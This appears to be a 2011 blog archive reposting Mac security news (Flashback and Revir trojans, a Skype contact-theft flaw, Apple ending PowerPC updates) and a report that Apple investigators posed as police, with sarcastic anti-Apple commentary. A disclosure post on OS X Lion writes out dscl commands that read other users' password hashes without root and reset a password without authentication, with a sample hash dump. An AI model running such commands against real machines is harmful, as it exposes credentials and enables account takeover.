Tuesday, September 27, 2011

Mac trojan pretends to be Flash Player Installer to get in the door

from arstechnica.com
It's funny because it's Flash

Hot on the heels of last week's Mac malware posing as a PDF is a new piece of malware posing as something even more insidious: a Flash player installer. Security firm Intego was the first to post about the new malware on its blog, noting that although the company has only received one report so far from a user who downloaded it, the malware does exist in the wild and may trick Mac users who don't yet have Flash installed.

The malware in question is a trojan horse called Flashback (OSX/flashback.A); users may end up acquiring it by clicking a link on a malicious website to download or install Flash player. If those users also have their Safari settings to automatically open safe files (which .pkg and .mkpg files are considered to be), an installer will show up on their desktops as if they are legitimately installing Flash.

Continuing through the installation process will result in the trojan deactivating certain types of security software (Intego specifically noted that the popular Little Snitch would be affected) and installing a dynamic loader library (dyld) with that can auto-launch, "allowing it to inject code into applications the user launched." The trojan then reports back to a remote server about the user's MAC address and allows the server to detect whether the Mac in question has been infected or not.

The threat is currently marked as "low," but Mac users are advised to follow safe security practices—don't open files or attachments that you don't remember downloading, and turn off Safari's setting for opening safe files automatically. It's also worth noting that Apple now updates its malware definition file on a daily basis, and has already updated it to address the PDF trojan discussed last week. If you haven't already scoured the Internet for a malicious version of the Flash installer, then it's likely Apple will have added the new malware to the file by the time you run into it.

Sunday, September 25, 2011

New Mac Trojan Found Disguised as PDF File

"Then, Lancelot, Galahad and I jump OUT of the rabbit..."

Summary: A newly discovered Mac vulnerability disguises itself as a PDF to trick users into opening it, which installs an Apache server on your Mac. Luckily it hasn’t been weaponized. Yet.

Just when you thought that it was safe to start using your Mac again comes a report that a new PDF vulnerability may be targeting Mac users.

Fellow ZDNet blogger Ryan Naraine brings the news via his Zero Day blog, that the malware, Trojan-Dropper:OSX/Revir.A “installs downloader component that downloads a backdoor program onto the system, while camouflaging its activity by opening a PDF file to distract the user.”


F-Secure notes that the vulnerability disguises itself as an Adobe Acrobat (PDF) file in an effort to trick users into opening it, which of course, triggers its payload. It even opens a bogus Chinese-language PDF in order to deceive the user and avoid detection. The payload, Backdoor:OSX/Imuler.A according to F-Secure, then runs in the background.

The good news, I suppose, is that Revir.A is fairly innocuous at this point. The payload is a bare Apache installation that is “not capable of communicating with the backdoor yet.” The going theory is that the author may have leaked it to see if any of the antivirus detectors picked it up. Luckily, someone did.

It’s important for Apple to act swiftly on this one. From the looks of things Revir.A probably wouldn’t be too hard to weaponize and we’re not sure how many people might already have the source code.

Apple: you’re on the clock.

MD5 hashes for the samples:

• Trojan-Dropper:OSX/Revir.A: fe4aefe0a416192a1a6916f8fc1ce484
• Trojan-Downloader:OSX/Revir.A: dfda0ddd62ac6089c6a35ed144ab528e
• Backdoor:OSX/Imuler.A: 22b1af87dc75a69804bcfe3f230d8c9d

Friday, September 23, 2011

Apple iPhone Contacts Hacked Through Simple Message

from SmartOffice.com

The dedicated Skype application native to Apple’s iPods and iPhones enables attackers to steal contact information by simply sending a malicious message.
Security researcher Phil Purviance warned Skype about the vulnerability on August 24th and shared his findings with the public on September 19th, according to a SMH report. By exploiting the vulnerability, Skype friends can send a text message harbouring malicious code to a target and steal their entire address book.

By simply viewing the message the victim's address book will be uploaded behind the scenes, oblivious that a hack is taking place on their beloved phone.

Taking to Twitter, Purviance said Skype was working to release an update that would patch the hole sometime this month. The publisher of Skype's website recognised the issue and said their "working hard" on a fix, which they hope "to roll out imminently."

"In the meantime we always recommend people exercise caution in only accepting friend requests from people they know and practice common sense internet security as always."

Purviance noted that the vulnerability affects Skype version 3.0.1 and its earlier releases. On YouTube, he posted a proof of concept video documenting an exploit of the software vulnerability.
While this is mostly Skype's problem, you would think that Apple's strict team of brilliant app inspectors would have been able to identify this before it got out. Guess not.

Sunday, September 18, 2011

Apple Makes Cracking OS X Lion Passwords Easier Than EverB

from DefenseIndepth
You are now root!
In 2009 I posted an article on Cracking Mac OS X passwords. Whilst this post has been quite popular, it was written for OS X 10.6 and prior. Since the release of Mac OS X Lion (10.7) in July, I have received numerous requests for an update. Typically, I would have just updated the existing article without the need for a new post. However, during my research I discovered something interesting about OS X Lion that I'd like to share.

In previous versions of OS X (10.6, 10.5, 10.4) the process to extract user password hashes has been the same: obtain the user's GeneratedUID and then use that ID to extract hashes from a specific user's shadow file (See my previous post for a more detailed description).

When it comes to Lion, the general premise is the same (albeit a few technical differences). Each user has their own shadow file, with each shadow file stored under a .plist file located in /var/db/dslocal/nodes/Default/users/.

The interesting thing when it comes to Lion's implementation, however, is privilege. As mentioned above, all OS X versions are using shadow files. For the unfamiliar, a shadow file is that which can only be accessed by users with a high privilege (typically root). So for all modern OS X platforms (Tiger, Leopord, Snow Leapord and Lion) each user has their own shadow file (hash database) whose data is accessible only by the root user… or at least it should be.

It appears in the redesign of OS X Lion's authentication scheme a critical step has been overlooked. Whilst non-root users are unable to access the shadow files directly, Lion actually provides non-root users the ability to still view password hash data. This is accomplished by extracting the data straight from Directory Services.

If we invoke a a directory services listing on user bob by specifying the /Local/ path we can see bobs standard profile information:

$ dscl localhost -read /Local/Default/Users/bob

This provides us with nothing too exciting. However, if we invoke the directory services listing using the /Search/ path, we see a different result:

$ dscl localhost -read /Search/Users/bob

From the output, we can see the following data:


62706c69 73743030 d101025d 53414c54 45442d53 48413531 324f104474911f72 3bd2f66a 3255e0af 4b85c639 776d510b 63f0b939 c432ab6e 082286c4 7586f19b 4e2f3aab 74229ae1 24ccb11e 916a7a1c 9b29c64b d6b0fd6c bd22e7b1 f0ba1673 080b1900 00000000 00010100 00000000 00000300 00000000 00000000 00000000 000060

Note: The SHA512 hash is stored from bytes 32-96 (green) and the salt is stored from bytes 28-31(red). For more information on these hashes please see this thread.

This ShadowHashData attribute actually contains the same hash stored in user bob's shadow .plist file. The interesting thing about this? root privileges are not required. All users on the system, regardless of privilege, have the ability to access the ShadowHashData attribute from any other user's profile.

Due to Lions relatively short time on the market, I am yet to find any of the major crackers supporting OS X Lion hashes (SHA512 + 4-byte salt). To simplify the cracking of these hashes I have created a simple python script which can be downloaded here.

Now, if the password is not found by the dictionary file you're out of luck, right? Well, no! Why crack hashes when you can just change the password directly! It appears Directory Services in Lion no longer requires authentication when requesting a password change for the current user. So, in order to change the password of the currently logged in user, simply use:

$ dscl localhost -passwd /Search/Users/bob

And viola! You will be prompted to enter a new password without the need to authenticate.

Thanks Apple.

Wednesday, September 14, 2011

Apple discontinues security updates for old Macs

from GMANews.com

Sad little Mac
Owners of Apple computers five or more years old, be warned: you're on your own, security-wise.

This was the warning aired by a security researcher who said Apple stopped releasing security updates for Macs with PowerPC G4 or G5 processors.

"Macs purchased as recently as 5 years ago are now left exposed to known security vulnerabilities," researcher Joshua Long said in a blog post .

"Apple should consider supporting Mac hardware for at least a few years longer than it has been in recent years. If Apple had chosen to support the last generation of G4/G5 Macs with Snow Leopard, and the first-generation Intel Core Solo/Duo Macs with Lion, it would have added an additional two years onto the life cycle of each hardware platform. For many Apple customers, having to throw away their hardware and spend $1,000 or more on a new computer every 5 or 6 years (or risk being exposed to security exploits) is not a very reasonable solution," he added.

He also noted Apple's latest security update to counter the rogue security certificates recently issued by DigiNotar did not cover such Macs.

Apple's Security Update 2011-005 fixes the problem only on Mac OS X v10.6 "Snow Leopard" and Mac OS X v10.7 "Lion," both of which can only run on Intel-based Macs.

Since January 2006, Apple has transitioned from using the PowerPC to Intel processors.

"Until (last weekend), Apple had been releasing security updates for Mac OS X v10.5 Leopard, the final version of the Mac operating system that is compatible with G4 and G5 processors. Prior to Apple's transition to the Intel architecture in 2006, all Macs had been based on the IBM/Motorola PowerPC G4 and G5 processors," Long noted.

He said that while the machines bought in 2006 are still expected to run well, they have been cut them off from getting security updates from Apple.

"This poses a problem for some businesses and consumers who were not expecting to have to spend thousands of dollars on new hardware this year; note that the Xserve and Power Macintosh G5 in particular were high-end hardware and the most expensive models," he said.

Long said this may also impact on businesses that bought many Macs before the Intel transition, and even on schools with computer labs with iMacs purchased at the beginning of the 2005 school year.

On the other hand, he said Apple has a history of only releasing security updates for the most recent and one previous major release of its Mac OS X operating system - in this case, Lion and Snow Leopard, respectively.

Forced shift to Windows?

Long pointed out the cost of replacing all of the six-year-old computers at once may be particularly burdensome due to economic factors including budget cuts in education.

"If they cannot afford to buy that many new Macs this year, they may be forced to seek alternative solutions such as replacing their Macs with sub-$400 Windows PCs," he said.

Safari updates not enough

Long also said it is not enough to issue security updates for Apple's Safari browser and QuickTime media player to make Leopard and earlier OS X versions safe and secure.

"Since Apple is not releasing updates for the operating system itself, whenever new vulnerabilities are discovered that affect the core of Leopard, Apple will do nothing to help protect Leopard users from these vulnerabilities," he said.

Adobe Flash update problems

Long also warned users of Leopard on PowerPC-based Macs that Adobe stopped releasing Flash Player updates for PowerPC in February 2011.

He said this makes PowerPC Mac users vulnerable to Flash vulnerabilities that have been widely exploited in the wild.

Manual remedies

At least for now, Long said G4 and G5 users running Leopard can hold out on buying an Intel-based Mac for a bit longer if absolutely necessary, if they manually implement a few security tweaks.

He advised them to:

  1. manually delete the DigiNotar Root CA from their systems
  2. disable Java in all browsers
  3. uninstall Flash Player

"If Flash is absolutely necessary for a few trusted sites, users can install the insecure final version of Flash Player 10.1 ... and block Flash content by default using a browser add-on," he said.

Another alternative is to try using the latest release of Ubuntu Linux for PowerPC as an alternative to Leopard.

However, Long said those who try Ubuntu for PPC will likely be disappointed by the limited PowerPC support from third-party Linux software developers.

Microsoft to continue security for WinXP

Meanwhile, Long noted Microsoft will continue to offer security updates for Windows XP, the first version of which was released in 2001, until April 2014.

"At first glance, this makes Apple's dropping of support for 5-year-old computers look especially bad. However, Microsoft allowed PC manufacturers to sell Windows 7 PCs 'downgraded' to Windows XP (that is, with Windows XP preinstalled) as recently as October 2010, so users who bought Windows XP computers then will only receive updates for their installed operating system for a total of 3.5 years," he said.

He said the major difference is that unlike Mac users, Windows XP users will have the option to reformat their systems and install a newer version of Windows after the April 2014 deadline.

In contrast, PowerPC Mac users have no similar option because their hardware is no longer supported, not just their operating system.
Again, Apple could care less about looking bad.   Why would they stop support? If Mac security is so great, it should be easy and cost them very little.  I know. To force people who want their products bad enough to shell out even more cash.  Cha-ching Apple!

Saturday, September 3, 2011

Apple Investigators Allegedly Posed as Cops in iPhone Prototype Hunt

Above the Law? We ARE the Law
from wired.com
A little more light has been shed on the odd story of Apple losing another iPhone prototype in a Bay Area bar.

The man who’s home was searched by what he believed to be San Francisco Police Department officers was Bernal Heights resident Sergio Calderón, SF Weekly discovered. And the police officers? They may have been investigators working for Apple who were actually impersonating police officers.

Impersonating a police officer is a misdemeanor in California, and is punishable by up to a year of jail time. Another option is that Apple was working with police officers, and a proper report was never filed. When the SFPD has been called and asked about the Apple incident, representatives said they had no knowledge of the search.

“This is something that’s going to need to be investigated now,” SFPD spokesman Lt. Troy Dangerfield told SF Weekly. “If this guy is saying that the people said they were SFPD, that’s a big deal.”

On Wednesday CNET News.com reported that in late July an Apple representative lost a “priceless” next generation iPhone prototype in San Francisco bar Cava 22. Apple reportedly used GPS to track the phone to a Bernal Heights area home, where police officers were given permission to search the home for the device. The resident was offered money by Apple for the iPhone’s safe return, but it was not turned in. The phone was sold on Craigslist for $200, according to CNET, but no independent evidence of the post has surfaced.

The incident is reminiscent of what happened last year when an iPhone 4 prototype was left at a Redwood City bar, and purchased for $5,000 by Gizmodo.

Here’s what went down, according to the new report by SF Weekly:

Calderón said that at about 6 p.m. six people — four men and two women — wearing badges of some kind showed up at his door. “They said, ‘Hey, Sergio, we’re from the San Francisco Police Department.’” He said they asked him whether he had been at Cava 22 over the weekend (he had) and told him that they had traced a lost iPhone to his home using GPS.

They did not say they were there on Apple’s behalf, but they said that the “owner of the phone” would offer Calderón $300 for the phone.

Calderón told SF Weekly that he was threatened by the law-enforcement officers when they visited his house, and said that he has no knowledge of the prototype.

One of the officers who visited the Calderón household was a man named “Tony”. He left his phone number with Calderón in case he discovered any information about the lost phone. It turns out the phone number belongs to an ex-cop named Anthony Colon, who apparently now works for Apple. A search on LinkedIn found that Colon works as a special investigator for Apple and is a former San Jose police officer. That page is now removed from the site, but caches can still be viewed.

This tale keeps getting weirder and weirder. Apple hasn’t returned phone calls on the matter from Wired.com.
Yet more illegal and/or immoral activity from the almighty Apple.   They'll probably claim that this was the work of someone operating against their orders and "disciplinary action" will be taken with that individual.  Yeah, more plausible deniability BS.  If this story is verified, Apple needs to face serious charges.  Put a few CEOs in prison, that just might open a few eyes.